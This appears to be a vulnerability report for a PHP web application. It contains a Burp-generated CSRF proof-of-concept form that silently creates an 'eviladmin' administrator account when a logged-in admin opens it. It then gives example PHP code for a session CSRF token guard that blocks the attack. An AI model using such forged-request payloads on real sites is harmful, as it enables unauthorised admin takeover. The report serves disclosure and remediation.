After the admin logs in, click the following link and eviladmin will be created with admin's privileges.
PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/kli/admin/admin_users.php" method="POST">
<input type="hidden" name="username" value="eviladmin" />
<input type="hidden" name="email" value="a11aa@aa.com" />
<input type="hidden" name="level" value="admin" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="mode" value="newuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
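The PoC form above carries only fixed, attacker-chosen fields, so a request forged from another origin is indistinguishable from one the admin submitted. The following is an added example, not part of the original report and not the project's own code: a per-session CSRF token guard of the kind a handler such as `admin_users.php` could apply before acting on `mode=newuser`. The function names and the `csrf_token` field name are assumptions.

```php
<?php
// Added example (hypothetical helper names; not the project's code).
// SameSite keeps the session cookie off cross-site POSTs in supporting browsers.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]);
session_start();

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every admin form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

/** Constant-time comparison; non-string input (e.g. csrf_token[]=x) is rejected. */
function csrf_token_is_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== ''
        && is_string($submitted)
        && hash_equals($expected, $submitted);
}

// Guard at the top of the handler: refuse any POST, including mode=newuser,
// that does not carry the token issued to this admin session.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The existing handling of $_POST['mode'] would continue here.
}
```

With this guard in place, the auto-generated form in the PoC is answered with 403 because it cannot supply the session's token; legitimate admin forms include it by emitting `csrf_field()` inside the `<form>`.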